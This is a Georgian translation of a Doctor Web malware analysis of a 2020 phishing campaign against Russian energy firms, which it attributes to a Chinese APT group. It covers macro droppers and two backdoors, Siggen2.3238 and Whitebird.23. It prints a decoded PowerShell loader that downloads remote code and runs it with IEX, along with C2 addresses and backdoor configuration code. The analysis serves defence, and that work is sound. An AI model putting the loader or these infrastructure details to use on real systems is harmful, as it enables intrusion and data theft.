ჩვენ ვიძიებთ მიზანმიმართულ ჯაშუშურ თავდასხმას რუსეთის საწვავის და ენერგეტიკულ კომპლექსზე

კომპიუტერული უსაფრთხოების ინციდენტების გამოძიების ჩვენი გამოცდილება აჩვენებს, რომ ელფოსტა კვლავ არის ერთ-ერთი ყველაზე გავრცელებული არხი, რომელსაც თავდამსხმელები იყენებენ თავდასხმის ქსელის ინფრასტრუქტურაში თავდასხმის მიზნით. ერთი უყურადღებო ქმედება საეჭვო (ან არც ისე საეჭვო) წერილით ხდება შემდგომი ინფექციის შესასვლელი წერტილი, რის გამოც კიბერკრიმინალები აქტიურად იყენებენ სოციალური ინჟინერიის მეთოდებს, თუმცა წარმატების სხვადასხვა ხარისხით.

ამ პოსტში გვინდა ვისაუბროთ ჩვენს ბოლოდროინდელ გამოძიებაზე სპამის კამპანიის შესახებ, რომელიც გამიზნულია რუსეთის საწვავის და ენერგეტიკული კომპლექსის რამდენიმე საწარმოზე. ყველა თავდასხმა ერთსა და იმავე სცენარს მოჰყვა ყალბი ელ.ფოსტის გამოყენებით და, როგორც ჩანს, არავის არ ჩაუდენია დიდი ძალისხმევა ამ წერილების ტექსტურ შინაარსში.

Exploration

ყველაფერი დაიწყო 2020 წლის აპრილის ბოლოს, როდესაც Doctor Web ვირუსის ანალიტიკოსებმა აღმოაჩინეს სპამის კამპანია, რომელშიც ჰაკერებმა განახლებული სატელეფონო დირექტორია გაუგზავნეს რუსეთის საწვავის და ენერგეტიკული კომპლექსის რიგი საწარმოების თანამშრომლებს. რა თქმა უნდა, ეს არ იყო უბრალო შეშფოთების ჩვენება, რადგან დირექტორია არ იყო რეალური და .docx დოკუმენტებმა ჩამოტვირთეს ორი სურათი დისტანციური რესურსებიდან.

ერთი მათგანი გადმოწერილი იქნა მომხმარებლის კომპიუტერში news[.]zannews[.]com სერვერიდან. აღსანიშნავია, რომ დომენის სახელი ყაზახეთის ანტიკორუფციული მედია ცენტრის - zannews[.]kz დომენის მსგავსია. მეორეს მხრივ, გამოყენებული დომენი მაშინვე მოგვაგონებდა 2015 წლის სხვა კამპანიას, რომელიც ცნობილია TOPNEWS-ის სახელით, რომელიც იყენებდა ICEFOG-ის უკანა კარს და ჰქონდა ტროას კონტროლის დომენები ქვესტრიქონებით „ახალი ამბები“ მათ სახელებში. კიდევ ერთი საინტერესო თვისება ის იყო, რომ სხვადასხვა მიმღებებთან ელ.ფოსტის გაგზავნისას, სურათის ჩამოტვირთვის მოთხოვნა იყენებდა მოთხოვნის სხვადასხვა პარამეტრებს ან გამოსახულების უნიკალურ სახელებს.

მიგვაჩნია, რომ ეს გაკეთდა ინფორმაციის შეგროვების მიზნით „სანდო“ ადრესატის იდენტიფიცირებისთვის, რომელიც შემდეგ გარანტირებული იქნებოდა წერილს საჭირო დროს გახსნის. SMB პროტოკოლი გამოიყენებოდა სურათის მეორე სერვერიდან ჩამოსატვირთად, რაც შეიძლება გაკეთდეს NetNTLM ჰეშების შესაგროვებლად იმ თანამშრომლების კომპიუტერებიდან, რომლებმაც გახსნეს მიღებული დოკუმენტი.

და აი, თავად წერილი ყალბი დირექტორია:

მიმდინარე წლის ივნისში, ჰაკერებმა დაიწყეს ახალი დომენის, sports[.]manhajnews[.]com გამოყენება სურათების ასატვირთად. ანალიზმა აჩვენა, რომ manhajnews[.]com ქვედომენები გამოყენებულია სპამის შეტყობინებებში მინიმუმ 2019 წლის სექტემბრიდან. ამ კამპანიის ერთ-ერთი სამიზნე იყო დიდი რუსული უნივერსიტეტი.

ასევე, ივნისისთვის თავდასხმის ორგანიზატორებმა თავიანთი წერილებისთვის ახალი ტექსტი გამოიტანეს: ამჯერად დოკუმენტი შეიცავდა ინფორმაციას ინდუსტრიის განვითარების შესახებ. წერილის ტექსტში ნათლად იყო მითითებული, რომ მისი ავტორი ან არ იყო რუსული ენის მშობლიური ენა, ან შეგნებულად ქმნიდა ასეთ შთაბეჭდილებას საკუთარ თავზე. სამწუხაროდ, ინდუსტრიის განვითარების იდეები, როგორც ყოველთვის, მხოლოდ ყდა აღმოჩნდა - დოკუმენტმა კვლავ ჩამოტვირთა ორი სურათი, ხოლო სერვერი შეიცვალა download[.]inklingpaper[.]com.

შემდეგი ინოვაცია ივლისში მოჰყვა. ანტივირუსული პროგრამების მიერ მავნე დოკუმენტების აღმოჩენის გვერდის ავლით, თავდამსხმელებმა დაიწყეს პაროლით დაშიფრული Microsoft Word დოკუმენტების გამოყენება. ამავე დროს, თავდამსხმელებმა გადაწყვიტეს გამოეყენებინათ სოციალური ინჟინერიის კლასიკური ტექნიკა - ჯილდოს შეტყობინება.

მიმართვის ტექსტი ისევ იმავე სტილით დაიწერა, რამაც ადრესატში დამატებითი ეჭვი გამოიწვია. სურათის ჩამოტვირთვის სერვერი ასევე არ შეცვლილა.

გაითვალისწინეთ, რომ ყველა შემთხვევაში წერილების გასაგზავნად გამოიყენებოდა mail[.]ru და yandex[.]ru დომენებზე რეგისტრირებული ელექტრონული საფოსტო ყუთები.

თავდასხმა

2020 წლის სექტემბრის დასაწყისში მოქმედების დრო დადგა. ჩვენმა ვირუსის ანალიტიკოსებმა დააფიქსირეს თავდასხმების ახალი ტალღა, რომლის დროსაც თავდამსხმელები კვლავ უგზავნიდნენ წერილებს სატელეფონო დირექტორიას განახლების საბაბით. თუმცა, ამჯერად დანართი შეიცავდა მავნე მაკროს.

თანდართული დოკუმენტის გახსნისას მაკრომ შექმნა ორი ფაილი:

• VBS სკრიპტი %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, რომელიც გამიზნული იყო სერიული ფაილის გასაშვებად;
• თავად სერიული ფაილი %APPDATA%configstest.bat, რომელიც ბუნდოვანი იყო.

მისი მუშაობის არსი მოდის Powershell-ის გარსის გაშვებაზე გარკვეული პარამეტრებით. გარსზე გადაცემული პარამეტრები დეკოდირდება ბრძანებებად:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

როგორც წარმოდგენილი ბრძანებებიდან ჩანს, დომენი, საიდანაც ჩამოტვირთულია დატვირთვა, კვლავ შენიღბულია როგორც ახალი ამბების საიტი. Მარტივი მტვირთავი, რომლის ერთადერთი ამოცანაა ბრძანებისა და კონტროლის სერვერიდან shellcode-ის მიღება და მისი შესრულება. ჩვენ შევძელით ორი ტიპის უკანა კარის იდენტიფიცირება, რომლებიც შეიძლება დაინსტალირდეს მსხვერპლის კომპიუტერზე.

BackDoor.Siggen2.3238

პირველი არის BackDoor.Siggen2.3238 — ჩვენს სპეციალისტებს აქამდე არ შეხვედრიათ და არც სხვა ანტივირუსული მწარმოებლების მიერ იყო აღნიშნული პროგრამა.

ეს პროგრამა არის backdoor დაწერილი C++-ზე და მუშაობს 32-ბიტიან Windows ოპერაციულ სისტემებზე.

BackDoor.Siggen2.3238 შეუძლია მართვის სერვერთან კომუნიკაცია ორი პროტოკოლის გამოყენებით: HTTP და HTTPS. შემოწმებული ნიმუში იყენებს HTTPS პროტოკოლს. შემდეგი მომხმარებლის აგენტი გამოიყენება სერვერის მიმართ მოთხოვნებში:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

ამ შემთხვევაში, ყველა მოთხოვნას მიეწოდება შემდეგი პარამეტრების ნაკრები:

%s;type=%s;length=%s;realdata=%send

სადაც თითოეული ხაზი %s შესაბამისად ჩანაცვლებულია:

• ინფიცირებული კომპიუტერის ID,
• გაგზავნილი მოთხოვნის ტიპი,
• მონაცემთა სიგრძე realdata ველში,
• მონაცემები.

ინფიცირებული სისტემის შესახებ ინფორმაციის შეგროვების ეტაპზე, backdoor წარმოქმნის ხაზს, როგორიცაა:

lan=%s;cmpname=%s;username=%s;version=%s;

სადაც lan არის ინფიცირებული კომპიუტერის IP მისამართი, cmpname არის კომპიუტერის სახელი, მომხმარებლის სახელი არის მომხმარებლის სახელი, ვერსია არის ხაზი 0.0.4.03.

ეს ინფორმაცია sysinfo იდენტიფიკატორთან ერთად იგზავნება POST მოთხოვნის მეშვეობით საკონტროლო სერვერზე, რომელიც მდებარეობს https[:]//31.214[.]157.14/log.txt. თუ პასუხად BackDoor.Siggen2.3238 იღებს HEART სიგნალს, კავშირი წარმატებულად ითვლება და უკანა კარი იწყებს სერვერთან კომუნიკაციის ძირითად ციკლს.

ოპერაციული პრინციპების უფრო სრულყოფილი აღწერა BackDoor.Siggen2.3238 არის ჩვენში ვირუსების ბიბლიოთეკა.

BackDoor.Whitebird.23

მეორე პროგრამა არის BackDoor.Whitebird backdoor-ის მოდიფიკაცია, რომელიც ჩვენთვის უკვე ცნობილია ყაზახეთის სამთავრობო სააგენტოსთან მომხდარი ინციდენტიდან. ეს ვერსია დაწერილია C++-ზე და შექმნილია როგორც 32-ბიტიან, ასევე 64-ბიტიან Windows ოპერაციულ სისტემებზე გასაშვებად.

ამ ტიპის პროგრამების უმეტესობის მსგავსად, BackDoor.Whitebird.23 შექმნილია საკონტროლო სერვერთან დაშიფრული კავშირის დასამყარებლად და ინფიცირებული კომპიუტერის არაავტორიზებული კონტროლისთვის. დაინსტალირებულია კომპრომეტირებულ სისტემაში საწვეთურის გამოყენებით BackDoor.Siggen2.3244.

ჩვენ მიერ შესწავლილი ნიმუში იყო მავნე ბიბლიოთეკა ორი ექსპორტით:

• Google Play
• ტესტი.

მისი მუშაობის დასაწყისში ის შიფრავს კონფიგურაციას, რომელიც მიმაგრებულია უკანა კარის სხეულში, ალგორითმის გამოყენებით, რომელიც დაფუძნებულია XOR ოპერაციაზე ბაიტით 0x99. კონფიგურაცია ასე გამოიყურება:

struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

მისი მუდმივი მუშაობის უზრუნველსაყოფად, უკანა კარი ცვლის ველში მითითებულ მნიშვნელობას სამუშაო საათები კონფიგურაციები. ველი შეიცავს 1440 ბაიტს, რომელიც იღებს მნიშვნელობებს 0 ან 1 და წარმოადგენს ყოველ წუთს დღის განმავლობაში. ქმნის ცალკეულ თემას თითოეული ქსელის ინტერფეისისთვის, რომელიც უსმენს ინტერფეისს და ეძებს ავტორიზაციის პაკეტებს პროქსი სერვერზე ინფიცირებული კომპიუტერიდან. როდესაც ასეთი პაკეტი აღმოჩენილია, backdoor ამატებს ინფორმაციას პროქსი სერვერის შესახებ მის სიაში. გარდა ამისა, ამოწმებს პროქსის არსებობას WinAPI-ის საშუალებით InternetQueryOptionW.

პროგრამა ამოწმებს მიმდინარე წუთს და საათს და ადარებს ველში არსებულ მონაცემებს სამუშაო საათები კონფიგურაციები. თუ დღის შესაბამისი წუთის მნიშვნელობა არ არის ნული, მაშინ მყარდება კავშირი საკონტროლო სერვერთან.

სერვერთან კავშირის დამყარება ახდენს კავშირის შექმნის სიმულაციას TLS ვერსიის 1.0 პროტოკოლის გამოყენებით კლიენტსა და სერვერს შორის. უკანა კარის სხეული შეიცავს ორ ბუფერს.

პირველი ბუფერი შეიცავს TLS 1.0 Client Hello პაკეტს.

მეორე ბუფერი შეიცავს TLS 1.0 Client Key Exchange პაკეტებს გასაღების სიგრძით 0x100 ბაიტი, Change Cipher Spec, Encrypted Handshake Message.

Client Hello პაკეტის გაგზავნისას, Backdoor წერს მიმდინარე დროის 4 ბაიტს და 28 ბაიტს ფსევდო შემთხვევით მონაცემებს Client Random ველში, გამოითვლება შემდეგნაირად:

v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

მიღებული პაკეტი იგზავნება საკონტროლო სერვერზე. პასუხი (Server Hello პაკეტი) ამოწმებს:

• TLS პროტოკოლის 1.0 ვერსიასთან შესაბამისობა;
• კლიენტის მიერ მითითებული დროის შტამპის (შემთხვევითი მონაცემების პაკეტის ველის პირველი 4 ბაიტი) შესაბამისობა სერვერის მიერ მითითებულ დროში;
• კლიენტისა და სერვერის შემთხვევითი მონაცემების ველში დროის ანაბეჭდის შემდეგ პირველი 4 ბაიტის მატჩი.

მითითებული შესატყვისების შემთხვევაში, backdoor ამზადებს Client Key Exchange პაკეტს. ამისათვის ის ცვლის საჯარო გასაღებს Client Key Exchange პაკეტში, ასევე დაშიფვრის IV და დაშიფვრის მონაცემებს Encrypted Handshake Message პაკეტში.

შემდეგ უკანა კარი იღებს პაკეტს ბრძანებისა და კონტროლის სერვერიდან, ამოწმებს, რომ TLS პროტოკოლის ვერსია არის 1.0 და შემდეგ იღებს კიდევ 54 ბაიტს (პაკეტის სხეული). ეს დაასრულებს კავშირის დაყენებას.

ოპერაციული პრინციპების უფრო სრულყოფილი აღწერა BackDoor.Whitebird.23 არის ჩვენში ვირუსების ბიბლიოთეკა.

დასკვნა და დასკვნები

დოკუმენტების, მავნე პროგრამების და გამოყენებული ინფრასტრუქტურის ანალიზი საშუალებას გვაძლევს დარწმუნებით ვთქვათ, რომ თავდასხმა მომზადდა ერთ-ერთი ჩინური APT ჯგუფის მიერ. თუ გავითვალისწინებთ უკანა კარების ფუნქციონალურობას, რომლებიც დაინსტალირებულია მსხვერპლთა კომპიუტერებზე წარმატებული თავდასხმის შემთხვევაში, ინფექცია იწვევს, მინიმუმ, კონფიდენციალური ინფორმაციის მოპარვას თავდასხმაში მყოფი ორგანიზაციების კომპიუტერებიდან.

გარდა ამისა, ძალიან სავარაუდო სცენარია სპეციალიზებული ტროას ინსტალაცია ადგილობრივ სერვერებზე სპეციალური ფუნქციით. ეს შეიძლება იყოს დომენის კონტროლერები, ფოსტის სერვერები, ინტერნეტ კარიბჭეები და ა.შ. როგორც მაგალითში დავინახეთ ინციდენტი ყაზახეთში, ასეთი სერვერები სხვადასხვა მიზეზის გამო თავდამსხმელებისთვის განსაკუთრებულ ინტერესს იწვევს.

წყარო: www.habr.com